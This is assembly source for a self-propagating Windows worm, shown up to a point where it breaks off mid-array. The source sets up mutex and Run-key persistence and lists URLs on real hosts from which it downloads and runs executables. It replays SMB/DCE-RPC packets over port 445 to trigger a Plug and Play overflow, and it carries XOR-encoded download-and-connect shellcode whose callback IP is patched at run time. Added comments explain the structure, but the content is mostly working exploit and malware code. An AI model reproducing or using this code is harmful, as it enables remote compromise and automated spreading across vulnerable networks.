  1. CPU 386
  2. [BITS 32]
  3.  
  4. ;To compile:
  5. ;nasmw -O6 -fwin32 PnP.asm
  6. ;link /RELEASE /entry:entry /subsystem:windows PnP.obj [libs]
  7.  
  ;Target: 32-bit Windows PE, stdcall Win32 API, no CRT start-up code (the
  ;entry point is _entry in section .text). This is a self-propagating
  ;sample; the constants below tune its scanner and exploit threads.
  8.  
  9. SCAN_THREADS        EQU 10      ;@Scan threads per batch (NT) and capacity of lpLocalIPs
  10. MAX_THREADS     EQU 80  ;only @AttackPnP threads
  11. TIMEOUT         EQU 5000        ;ms: connectivity poll period (_entry) and pre-select() wait (@Scan)
  12. SMB_RECV_TIMEOUT    EQU 60  ;seconds
  13. STACK_SIZE      EQU 0x3000  ;only @AttackPnP threads
  14. FL_EXECUTE_URL      EQU 1       ;flag byte values of the URLS table (section .rdata)
  15. FL_NOEXEC_URL       EQU 0
  16.  
  17.  
  18.  
  ;API name, argbytes[, export]: declare a stdcall Win32 import. Win32 object
  ;files reference stdcall functions by the decorated name _Name@N (N = byte
  ;count of the arguments), so after `API Sleep, 4` a plain `call Sleep`
  ;assembles to `call _Sleep@4`. The 3-parameter form binds an undecorated
  ;alias to a differently named export (the ANSI "A" variants below).
  19. %macro  API 2
  20.     %xdefine    %1  _%1@%2
  21.     extern  %1
  22. %endmacro
  23.  
  24. %macro  API 3
  25.     %xdefine    %1  _%3@%2
  26.     extern  %1
  27. %endmacro
  28.  
  29.  
  30.  
  ;kernel32 / wininet imports
  31. API WSAStartup,         8
  32. API Sleep,              4
  33. API InternetGetConnectedState,  8
  34. API GetVersion,         0
  35. API CreateThread,           24
  36. API ExitThread,         4
  37. API GetCurrentThreadId,     0
  38. API CloseHandle,            4
  39. API GetTickCount,           0
  40. API WaitForSingleObject,        8
  41. API CreateMutex,            12, CreateMutexA
  42. API ReleaseMutex,           4
  43. API InitializeCriticalSection,  4
  44. API EnterCriticalSection,       4
  45. API LeaveCriticalSection,       4
  46. API lstrlen,            4,  lstrlenA
  47. API GetModuleFileName,      12, GetModuleFileNameA
  48. API GetLastError,           0
  49. API ExitProcess,            4
  50. API GetFileSize,            8
  51. API CreateFile,         28, CreateFileA
  52. API WriteFile,          20
  53. API CreateFileMapping,      24, CreateFileMappingA
  54. API MapViewOfFile,          20
  55. API CreateProcess,          40, CreateProcessA
  56. API GetModuleHandle,        4,  GetModuleHandleA
  57. API LoadLibrary,            4,  LoadLibraryA   
  58. API GetProcAddress,         8
  59.  
  ;advapi32 imports: used only for the Run-key persistence in _entry
  60. API RegOpenKeyEx,           20, RegOpenKeyExA
  61. API RegSetValueEx,          24, RegSetValueExA
  62. API RegCloseKey,            4,  RegCloseKey
  63.  
  64.  
  ;ws2_32 imports
  65. API socket,             12
  66. API ioctlsocket,            12
  67. API connect,            12
  68. API bind,               12
  69. API listen,             8
  70. API accept,             12
  71. API select,             20
  72. API closesocket,            4
  73. API getpeername,            12
  74. API getsockname,            12
  75. API gethostname,            8
  76. API gethostbyname,          4
  77. API inet_ntoa,          4
  78. API send,               16
  79. API recv,               16
  80.  
  81.  
  ;cdecl imports (undecorated `_name`, no @N): callers - none in this view -
  ;must pop the arguments themselves.
  82. %xdefine    wsprintf    _wsprintfA
  83. extern      wsprintf
  84.  
  85. %xdefine    memcpy      _memcpy
  86. extern      memcpy
  87.  
  88.  
  89.  
  ;Winsock / Win32 constants (values as in the SDK headers)
  90. SOCK_STREAM     EQU 1
  91. SOCK_DGRAM      EQU 2
  92. IPPROTO_UDP     EQU 17
  93. SOMAXCONN       EQU 0x7fffffff
  94.  
  95. ERROR_ALREADY_EXISTS    EQU 183     ;GetLastError() after CreateMutex on a 2nd instance
  96. FIONBIO         EQU 0x8004667e      ;ioctlsocket: non-blocking mode (@Scan)
  97. KEY_WRITE       EQU 0x20006
  98. HKEY_LOCAL_MACHINE  EQU 0x80000002
  99. REG_SZ          EQU 1
  100. FILE_SHARE_READ     EQU 1
  101. OPEN_EXISTING       EQU 3
  102. CREATE_ALWAYS       EQU 2
  103. GENERIC_READ        EQU 0x80000000
  104. GENERIC_WRITE       EQU 0x40000000
  105. PAGE_READONLY       EQU 2
  106. FILE_MAP_READ       EQU 4
  107.  
  108.  
  109. section .bss
  ;Process-wide state shared by all threads (zero-initialised by the loader).
  110.  
  111. CONNECTED   resd    1   ;nonzero while InternetGetConnectedState reports a link (_entry); @Scan exits when it is 0
  112. THREADNUM   resd    1   ;<--|  live @AttackPnP thread count; presumably guarded by CS_THREADNUM (@AddThreadNum/@WaitMaxThreads are outside this view)
  113. OSVERSION   resd    1   ;GetVersion() result; bit 31 is tested in _entry and @Scan
  114. CS_THREADNUM    resd    6   ;CRITICAL_SECTION (24 bytes on 32-bit Windows)
  115. CS_LOOP     resd    6   ;CRITICAL_SECTION serialising @sleep across all threads
  116. MTX_CBACK   resd    1   ;handle of the unnamed mutex created in _entry (consumer outside this view)
  117. dwLocalIPs  resd    1   ;number of valid entries in lpLocalIPs (set by @GetLocalIPs)
  118. lpLocalIPs  resd    SCAN_THREADS    ;non-loopback local IPv4 addresses; @PortOpen skips peers found here
  119. WSADATA_LEN EQU 400
  120. WSADATA     resb    WSADATA_LEN     ;WSADATA for WSAStartup, afterwards reused as scratch (module path, host name, lpThreadId slot)
  121. dwFileSize  resd    1   ;not referenced in this view (presumably @Download / @FileServer)
  122. dwFilePointer   resd    1
  123. dwFileNameLen   EQU 512
  124. szFileName  resb    dwFileNameLen
  125. HTTP_BUFFER_LEN EQU (1024 * 4)
  126. HTTP_BUFFER resb    HTTP_BUFFER_LEN
  127.  
  128.  
  129.  
  130. section .rdata
  ;Read-only data. Indicators visible in this section: mutex name "Hiberium",
  ;Run-key value name "MSPRO32", download hosts strtt.interfree.it and
  ;utenti.lycos.it (URLS table), and an HTTP/1.1 GET with
  ;'Connection: close'. The SMB_* / RPC_* blobs are raw request templates
  ;(4-byte NetBIOS session header, then 0xFF 'SMB'; the SMB command byte is
  ;at offset 8) replayed over TCP/445 by @AttackPnP. Each *_LEN is computed
  ;from the assembler position counter right after the blob.
  131.  
  132. STR_IPC     DB  '\\%s\IPC$',0       ;share path format, %s = target host
  133. szMutexName DB  'Hiberium',0        ;single-instance mutex (_entry)
  134. szStartupKey    DB  'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
  135. szStartupValue  DB  'MSPRO32',0     ;Run-key value written by _entry
  136. STR_WS2_32  DB  'WS2_32',0          ;presumably resolved via LoadLibrary/GetProcAddress (caller outside this view)
  137. STR_WSASocket   DB  'WSASocketA',0
  138. STR_CMD     DB  'cmd',0
  139.  
  ;HTTP request template: wsprintf(HTTP_FMT, path, host) -> GET path / Host: host
  140. HTTP_FMT    DB  'GET %s HTTP/1.1', 0dH, 0Ah,
  141.         DB  'Host: %s', 0dH, 0AH,
  142.         DB  'Connection: close',
  143.         DB  0dh, 0ah, 0dh, 0ah, 0
  144.  
  ;URLS: sequence of NUL-terminated 'host/path' strings, each followed by one
  ;flag byte (FL_EXECUTE_URL / FL_NOEXEC_URL); a 0 where the next string would
  ;start ends the table. The consumer (@Download) is outside this view.
  145. URLS        DB  'strtt.interfree.it/VfProtect.exe', 0,
  146.         DB  FL_EXECUTE_URL,
  147.  
  148.         DB  'strtt.interfree.it/Hiberium.rar', 0,
  149.         DB  FL_NOEXEC_URL,
  150.  
  151.         DB  'utenti.lycos.it/strtt/VfProtect2.exe', 0,
  152.         DB  FL_EXECUTE_URL,
  153.  
  154.         DB  'utenti.lycos.it/strtt/Hiberium2.rar', 0,
  155.         DB  FL_NOEXEC_URL,
  156.  
  157.         DB  0   ;end of urls
  158.  
  159.  
  ;SMB_COM_NEGOTIATE (command 0x72); the ASCII dialect list is visible in the
  ;bytes ("PC NETWORK PROGRAM 1.0" ... "NT LM 0.12").
  160. SMB_Negotiate   \
  161.     DB     0x00, 0x00, 0x00, 0x85, 0xFF, 0x53, 0x4D, 0x42, 0x72, 0x00, 0x00, 0x00,
  162.     DB     0x00, 0x18, 0x53, 0xC8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  163.     DB     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0x00, 0x00, 0x00, 0x00,
  164.     DB     0x00, 0x62, 0x00, 0x02, 0x50, 0x43, 0x20, 0x4E, 0x45, 0x54, 0x57, 0x4F,
  165.     DB     0x52, 0x4B, 0x20, 0x50, 0x52, 0x4F, 0x47, 0x52, 0x41, 0x4D, 0x20, 0x31,
  166.     DB     0x2E, 0x30, 0x00, 0x02, 0x4C, 0x41, 0x4E, 0x4D, 0x41, 0x4E, 0x31, 0x2E,
  167.     DB     0x30, 0x00, 0x02, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73, 0x20, 0x66,
  168.     DB     0x6F, 0x72, 0x20, 0x57, 0x6F, 0x72, 0x6B, 0x67, 0x72, 0x6F, 0x75, 0x70,
  169.     DB     0x73, 0x20, 0x33, 0x2E, 0x31, 0x61, 0x00, 0x02, 0x4C, 0x4D, 0x31, 0x2E,
  170.     DB     0x32, 0x58, 0x30, 0x30, 0x32, 0x00, 0x02, 0x4C, 0x41, 0x4E, 0x4D, 0x41,
  171.     DB     0x4E, 0x32, 0x2E, 0x31, 0x00, 0x02, 0x4E, 0x54, 0x20, 0x4C, 0x4D, 0x20,
  172.     DB     0x30, 0x2E, 0x31, 0x32, 0x00
  173. SMB_Negotiate_LEN   EQU ($-SMB_Negotiate)
  174.  
  ;SMB_COM_SESSION_SETUP_ANDX (0x73) carrying an NTLMSSP type-1 token
  ;("NTLMSSP\0", 01 00 00 00) and UTF-16 "Windows 2000 2195"/"Windows 2000 5.0"
  ;native OS/LAN-manager strings.
  175. SMB_SessionSetupAndX    \
  176.     DB 0x00, 0x00, 0x00, 0xA4, 0xFF, 0x53, 0x4D, 0x42, 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xC8,
  177.     DB 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFE,
  178.     DB 0x00, 0x00, 0x10, 0x00, 0x0C, 0xFF, 0x00, 0xA4, 0x00, 0x04, 0x11, 0x0A, 0x00, 0x00, 0x00, 0x00,
  179.     DB 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0xD4, 0x00, 0x00, 0x80, 0x69, 0x00, 0x4E,
  180.     DB 0x54, 0x4C, 0x4D, 0x53, 0x53, 0x50, 0x00, 0x01, 0x00, 0x00, 0x00, 0x97, 0x82, 0x08, 0xE0, 0x00,
  181.     DB 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  182.     DB 0x57, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x64, 0x00, 0x6F, 0x00, 0x77, 0x00, 0x73, 0x00, 0x20, 0x00,
  183.     DB 0x32, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x20, 0x00, 0x32, 0x00, 0x31, 0x00, 0x39, 0x00,
  184.     DB 0x35, 0x00, 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x64, 0x00, 0x6F, 0x00, 0x77, 0x00,
  185.     DB 0x73, 0x00, 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x20, 0x00, 0x35, 0x00,
  186.     DB 0x2E, 0x00, 0x30, 0x00, 0x00, 0x00, 0x00, 0x00
  187. SMB_SessionSetupAndX_LEN    EQU ($-SMB_SessionSetupAndX)
  188.  
  ;Second SESSION_SETUP_ANDX (0x73) with an NTLMSSP type-3 token
  ;(03 00 00 00); a fixed, canned authentication blob - no per-target data.
  189. SMB_SessionSetupAndX2   \
  190.     DB 0x00, 0x00, 0x00, 0xDA, 0xFF, 0x53, 0x4D, 0x42, 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xC8,
  191.     DB 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFE,
  192.     DB 0x00, 0x08, 0x20, 0x00, 0x0C, 0xFF, 0x00, 0xDA, 0x00, 0x04, 0x11, 0x0A, 0x00, 0x00, 0x00, 0x00,
  193.     DB 0x00, 0x00, 0x00, 0x57, 0x00, 0x00, 0x00, 0x00, 0x00, 0xD4, 0x00, 0x00, 0x80, 0x9F, 0x00, 0x4E,
  194.     DB 0x54, 0x4C, 0x4D, 0x53, 0x53, 0x50, 0x00, 0x03, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x46,
  195.     DB 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x47, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40,
  196.     DB 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x06, 0x00, 0x06, 0x00, 0x40,
  197.     DB 0x00, 0x00, 0x00, 0x10, 0x00, 0x10, 0x00, 0x47, 0x00, 0x00, 0x00, 0x15, 0x8A, 0x88, 0xE0, 0x48,
  198.     DB 0x00, 0x4F, 0x00, 0x44, 0x00, 0x00, 0xED, 0x41, 0x2C, 0x27, 0x86, 0x26, 0xD2, 0x59, 0xA0, 0xB3,
  199.     DB 0x5E, 0xAA, 0x00, 0x88, 0x6F, 0xC5, 0x57, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x64, 0x00, 0x6F, 0x00,
  200.     DB 0x77, 0x00, 0x73, 0x00, 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x20, 0x00,
  201.     DB 0x32, 0x00, 0x31, 0x00, 0x39, 0x00, 0x35, 0x00, 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6E, 0x00,
  202.     DB 0x64, 0x00, 0x6F, 0x00, 0x77, 0x00, 0x73, 0x00, 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,
  203.     DB 0x30, 0x00, 0x20, 0x00, 0x35, 0x00, 0x2E, 0x00, 0x30, 0x00, 0x00, 0x00, 0x00, 0x00
  204. SMB_SessionSetupAndX2_LEN   EQU ($-SMB_SessionSetupAndX2)
  205.  
  ;SMB_COM_TREE_CONNECT_ANDX (0x75) header; the path (STR_IPC formatted with
  ;the target, presumably by @AttackPnP) and the trailer below follow it.
  206. SMB_TreeConnectAndX \
  207.     DB 0x00, 0x00, 0x00, 0x5A, 0xFF, 0x53, 0x4D, 0x42, 0x75, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xC8,
  208.     DB 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFE,
  209.     DB 0x00, 0x08, 0x30, 0x00, 0x04, 0xFF, 0x00, 0x5A, 0x00, 0x08, 0x00, 0x01, 0x00, 0x2F, 0x00, 0x00
  210. SMB_TreeConnectAndX_LEN     EQU ($-SMB_TreeConnectAndX)
  211.  
  ;Tree-connect trailer: service string "?????" (any service)
  212. SMB_TreeConnectAndX_    \
  213.     DB  0x00, 0x00, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x00
  214. SMB_TreeConnectAndX__LEN    EQU ($-SMB_TreeConnectAndX_)
  215.  
  ;SMB_COM_NT_CREATE_ANDX (0xA2) opening the UTF-16 pipe name "\browser"
  216. SMB_PipeRequest_browser     \
  217.     DB 0x00, 0x00, 0x00, 0x66, 0xFF, 0x53, 0x4D, 0x42, 0xA2, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xC8,
  218.     DB 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x78, 0x04,
  219.     DB 0x00, 0x08, 0x40, 0x00, 0x18, 0xFF, 0x00, 0xDE, 0xDE, 0x00, 0x10, 0x00, 0x16, 0x00, 0x00, 0x00,
  220.     DB 0x00, 0x00, 0x00, 0x00, 0x9F, 0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  221.     DB 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
  222.     DB 0x02, 0x00, 0x00, 0x00, 0x03, 0x13, 0x00, 0x00, 0x5C, 0x00, 0x62, 0x00, 0x72, 0x00, 0x6F, 0x00,
  223.     DB 0x77, 0x00, 0x73, 0x00, 0x65, 0x00, 0x72, 0x00, 0x00, 0x00
  224. SMB_PipeRequest_browser_LEN EQU ($-SMB_PipeRequest_browser)
  225.  
  ;SMB_COM_TRANSACTION (0x25) over "\PIPE\" carrying a DCE/RPC bind
  ;(05 00 0B: version 5.0, packet type 0x0B = bind) to the PnP endpoint.
  226. SMB_PNPEndpoint     \
  227.     DB 0x00, 0x00, 0x00, 0x9C, 0xFF, 0x53, 0x4D, 0x42, 0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xC8,
  228.     DB 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x78, 0x04,
  229.     DB 0x00, 0x08, 0x50, 0x00, 0x10, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
  230.     DB 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x54, 0x00, 0x48, 0x00, 0x54, 0x00, 0x02,
  231.     DB 0x00, 0x26, 0x00, 0x00, 0x40, 0x59, 0x00, 0x00, 0x5C, 0x00, 0x50, 0x00, 0x49, 0x00, 0x50, 0x00,
  232.     DB 0x45, 0x00, 0x5C, 0x00, 0x00, 0x00, 0x40, 0x00, 0x05, 0x00, 0x0B, 0x03, 0x10, 0x00, 0x00, 0x00,
  233.     DB 0x48, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0xB8, 0x10, 0xB8, 0x10, 0x00, 0x00, 0x00, 0x00,
  234.     DB 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x40, 0x4E, 0x9F, 0x8D, 0x3D, 0xA0, 0xCE, 0x11,
  235.     DB 0x8F, 0x69, 0x08, 0x00, 0x3E, 0x30, 0x05, 0x1B, 0x01, 0x00, 0x00, 0x00, 0x04, 0x5D, 0x88, 0x8A,
  236.     DB 0xEB, 0x1C, 0xC9, 0x11, 0x9F, 0xE8, 0x08, 0x00, 0x2B, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00
  237. SMB_PNPEndpoint_LEN     EQU ($-SMB_PNPEndpoint)
  238.  
  ;SMB_COM_TRANSACTION (0x25) with a DCE/RPC request (05 00 00) of 0x890
  ;bytes (NetBIOS length at offset 1-3). After the UTF-16 "ROOT\SYSTEM\0000"
  ;string the body is filler (0x90) and repeated constants: this is the
  ;oversized request that triggers the PnP overflow. It is deliberately not
  ;annotated further here; the exploit payload (shellcode) is expected to
  ;be assembled around it by @AttackPnP (outside this view).
  239. RPC_call        \
  240.     DB     0x00, 0x00, 0x08, 0x90, 0xFF, 0x53, 0x4D, 0x42, 0x25, 0x00, 0x00, 0x00,
  241.     DB     0x00, 0x18, 0x07, 0xC8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  242.     DB     0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x78, 0x04, 0x00, 0x08, 0x60, 0x00,
  243.     DB     0x10, 0x00, 0x00, 0x3C, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
  244.     DB     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x54, 0x00, 0x3C,
  245.     DB     0x08, 0x54, 0x00, 0x02, 0x00, 0x26, 0x00, 0x00, 0x40, 0x4D, 0x08, 0x00,
  246.     DB     0x5C, 0x00, 0x50, 0x00, 0x49, 0x00, 0x50, 0x00, 0x45, 0x00, 0x5C, 0x00,
  247.     DB     0x00, 0x00, 0x40, 0x00, 0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00,
  248.     DB     0x3C, 0x08, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x24, 0x08, 0x00, 0x00,
  249.     DB     0x00, 0x00, 0x36, 0x00, 0x11, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  250.     DB     0x11, 0x00, 0x00, 0x00, 0x52, 0x00, 0x4F, 0x00, 0x4F, 0x00, 0x54, 0x00,
  251.     DB     0x5C, 0x00, 0x53, 0x00, 0x59, 0x00, 0x53, 0x00, 0x54, 0x00, 0x45, 0x00,
  252.     DB     0x4D, 0x00, 0x5C, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00,
  253.     DB     0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00, 0xE0, 0x07, 0x00, 0x00,
  254.     DB     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x07, 0x00, 0x00,
  255.     DB     0x00, 0x00, 0x00, 0x00, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
  256.     DB     0xEB, 0x08, 0x90, 0x90, 0x67, 0x15, 0x7A, 0x76, 0xEB, 0x08, 0x90, 0x90,
  257.     DB     0x67, 0x15, 0x7A, 0x76, 0xEB, 0x08, 0x90, 0x90, 0x67, 0x15, 0x7A, 0x76,
  258.     DB     0xEB, 0x08, 0x90, 0x90, 0x67, 0x15, 0x7A, 0x76, 0xEB, 0x08, 0x90, 0x90,
  259.     DB     0x67, 0x15, 0x7A, 0x76, 0xEB, 0x08, 0x90, 0x90, 0x67, 0x15, 0x7A, 0x76,
  260.     DB     0xEB, 0x08, 0x90, 0x90, 0x67, 0x15, 0x7A, 0x76, 0xEB, 0x08, 0x90, 0x90,
  261.     DB     0x67, 0x15, 0x7A, 0x76, 0xEB, 0x08, 0x90, 0x90, 0x67, 0x15, 0x7A, 0x76,
  262.     DB     0xEB, 0x08, 0x90, 0x90, 0x67, 0x15, 0x7A, 0x76, 0x90, 0x90, 0x90, 0x90,
  263.     DB     0x90, 0x90, 0x90, 0xEB, 0x08, 0x90, 0x90, 0x48, 0x4F, 0x44, 0x88, 0x90,
  264.     DB     0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
  265.     DB     0x90, 0x90, 0x90, 0x90
  266. RPC_call_LEN        EQU ($-RPC_call)
  267.  
  ;trailer appended after the payload
  268. RPC_call_end        \
  269.     DB 0xE0, 0x07, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
  270. RPC_call_end_LEN    EQU ($-RPC_call_end)
  271.  
  272.  
  273.  
  ;Writable section: `shellcode` must be patched at run time (@InitShellcode
  ;writes the callback IP into it), which is why it is not in .rdata.
  274. section .data
  275.  
  ;Byte offsets of the IP / port slots inside `shellcode`, and the values they
  ;must be XORed with before being stored. The decoder stub at the start of
  ;the blob XORs the body with 0x154F1E2D (= SHELLCODE_XORIP) 4 bytes at a
  ;time, so a pre-XORed IP decodes to the clear value; the 2-byte port slot is
  ;not dword-aligned relative to the stub, hence the separate SHELLCODE_XORPORT.
  276. SHELLCODE_IP        EQU 327
  277. SHELLCODE_PORT      EQU 334
  278. SHELLCODE_XORIP     EQU 0x154F1E2D
  279. SHELLCODE_XORPORT   EQU 0x2d15
  280.  
  281.  
  282.  
  283. ;download connect
  ;Self-decoding payload (author label above). Only the IP slot is patched in
  ;this view (@InitShellcode); where the port is patched is outside it. The
  ;decoded body is not reproduced or described here.
  284. shellcode       \
  285.     DB     0x33, 0xC9, 0x81, 0xE9, 0x92, 0xFF, 0xFF, 0xFF, 0xE8, 0xFF, 0xFF, 0xFF,
  286.     DB     0xFF, 0xC0, 0x5E, 0x81, 0x76, 0x0E, 0x2D, 0x1E, 0x4F, 0x15, 0x83, 0xEE,
  287.     DB     0xFC, 0xE2, 0xF4, 0xD1, 0xF6, 0x32, 0x15, 0x2D, 0x1E, 0x1A, 0x43, 0x7A,
  288.     DB     0x95, 0x0C, 0x29, 0xA0, 0x6A, 0x4C, 0x6D, 0x80, 0xE1, 0x79, 0x14, 0xF5,
  289.     DB     0x4E, 0xC4, 0x5D, 0x35, 0x95, 0x27, 0x35, 0x2C, 0xC3, 0xAC, 0x49, 0x64,
  290.     DB     0x95, 0x3B, 0x98, 0x2D, 0x1F, 0x91, 0x24, 0xD2, 0x2F, 0x8F, 0xB9, 0x15,
  291.     DB     0xFE, 0x3B, 0x12, 0xEC, 0xD1, 0x42, 0x14, 0xEA, 0xF5, 0xBD, 0x2C, 0xFA,
  292.     DB     0x6B, 0xAC, 0x48, 0xA6, 0x4B, 0x6B, 0x14, 0xF7, 0x78, 0xC4, 0x19, 0x67,
  293.     DB     0x95, 0x1A, 0x09, 0x2C, 0xC4, 0xC4, 0x11, 0xA7, 0x1F, 0x97, 0x4C, 0x7D,
  294.     DB     0x37, 0xA7, 0x2C, 0xE5, 0x46, 0x38, 0x32, 0xBB, 0x9D, 0xA3, 0x55, 0xA4,
  295.     DB     0xF9, 0xE5, 0xB9, 0x11, 0x30, 0x3A, 0xEF, 0xEB, 0x19, 0x4F, 0x9C, 0xCA,
  296.     DB     0x59, 0xC4, 0x79, 0x09, 0x56, 0x18, 0xEA, 0x78, 0xE6, 0x19, 0x45, 0xD2,
  297.     DB     0x4B, 0xBB, 0x96, 0xE9, 0x26, 0xFE, 0x14, 0xAE, 0xDA, 0x47, 0x4A, 0x73,
  298.     DB     0x43, 0x8C, 0x71, 0x8C, 0x2E, 0x4F, 0x15, 0x2D, 0x9B, 0x8F, 0x6D, 0x21,
  299.     DB     0x95, 0x0F, 0x19, 0xA6, 0x6E, 0x53, 0xB8, 0xA6, 0x46, 0x47, 0xFE, 0x24,
  300.     DB     0x95, 0x0F, 0x21, 0xA6, 0x86, 0xF7, 0x15, 0x2D, 0x1E, 0x10, 0x9C, 0xC8,
  301.     DB     0x4D, 0xF5, 0x9B, 0x63, 0x10, 0xA3, 0xEA, 0xFA, 0x4E, 0xF5, 0xBF, 0xD1,
  302.     DB     0x13, 0x33, 0xEA, 0xFA, 0x4E, 0x1F, 0xFD, 0x39, 0x1E, 0x4F, 0x15, 0xD6,
  303.     DB     0x89, 0xB2, 0x1A, 0x88, 0x09, 0x4F, 0x69, 0x32, 0x67, 0x45, 0xFD, 0xC2,
  304.     DB     0xD0, 0xAF, 0x75, 0x5F, 0xE0, 0xFC, 0x03, 0x73, 0x74, 0x4A, 0x4C, 0x7C,
  305.     DB     0xB3, 0xDD, 0xEA, 0xFA, 0x47, 0x1F, 0xF7, 0xDA, 0xF6, 0x53, 0x15, 0x2D,
  306.     DB     0x1E, 0x18, 0x46, 0x1F, 0x41, 0x7C, 0x27, 0x2D, 0x1E, 0x84, 0xF8, 0xD1,
  307.     DB     0x25, 0x21, 0x1E, 0x02, 0x57, 0xA8, 0x6C, 0xEB, 0x67, 0xA3, 0xEC, 0x87,
  308.     DB     0x7E, 0xF9, 0x0C, 0x35, 0xF9, 0x11, 0x43, 0xD2, 0x4B, 0xB7, 0x86, 0x47,
  309.     DB     0x1B, 0x16, 0xB8, 0x80, 0x4F, 0xE2, 0x87, 0xD2, 0xC9, 0x16, 0x45, 0xCF,
  310.     DB     0xE9, 0xCE, 0xF9, 0x2D, 0x1C, 0x4F, 0x15, 0x79, 0x74, 0x4D, 0xEA, 0x78,
  311.     DB     0xC6, 0x7E, 0xD5, 0x7D, 0x4E, 0x1F, 0x7F, 0x2C, 0x74, 0x4D, 0xEA, 0x78,
  312.     DB     0xCA, 0xDC, 0x7D, 0x52, 0x1E, 0x4F, 0x14, 0x45, 0x1C, 0x4F, 0x37, 0x3C,
  313.     DB     0x97, 0xAD, 0x7F, 0x2D, 0x74, 0x49, 0x7F, 0x2F, 0x74, 0x4F, 0x7F, 0x2C,
  314.     DB     0x76, 0x4F, 0x15, 0x2D, 0x5E, 0xA7, 0x1E, 0x2D, 0x1E, 0x4F, 0x78, 0x5E,
  315.     DB     0x7D, 0x2E, 0x61, 0x5D, 0x30, 0x2A, 0x6D, 0x48, 0x1E, 0x17, 0x9C, 0x68,
  316.     DB     0xEE, 0x1F, 0x7F, 0x3D, 0x4C, 0x1C, 0xEA, 0x78, 0xD2, 0x46, 0xD5, 0x58,
  317.     DB     0x36, 0xB0, 0x40, 0xC5, 0x88, 0x0F, 0x61, 0x0C, 0x97, 0xA8, 0x7F, 0x2D,
  318.     DB     0x76, 0x4F, 0x17, 0x2D, 0x1E, 0x18, 0x46, 0xD2, 0x4B, 0x87, 0x1C, 0xED,
  319.     DB     0x60, 0x44, 0x7F, 0x2D, 0x4A, 0x1F, 0x42, 0x7B, 0xE1, 0x1A, 0xF1, 0xC6,
  320.     DB     0xFB, 0x19, 0xEA, 0x78, 0xF2, 0x1C, 0xEA, 0x78, 0xCE, 0x1B, 0x98, 0x51,
  321.     DB     0x3A, 0x5B, 0x42, 0x1C, 0xDE, 0x25, 0x51, 0x74, 0x97, 0x40, 0x52, 0xDE,
  322.     DB     0xB4, 0xFE, 0x12, 0x7D, 0xFC, 0xB2, 0xEA, 0x58, 0xEE, 0xB0, 0x40, 0xF1,
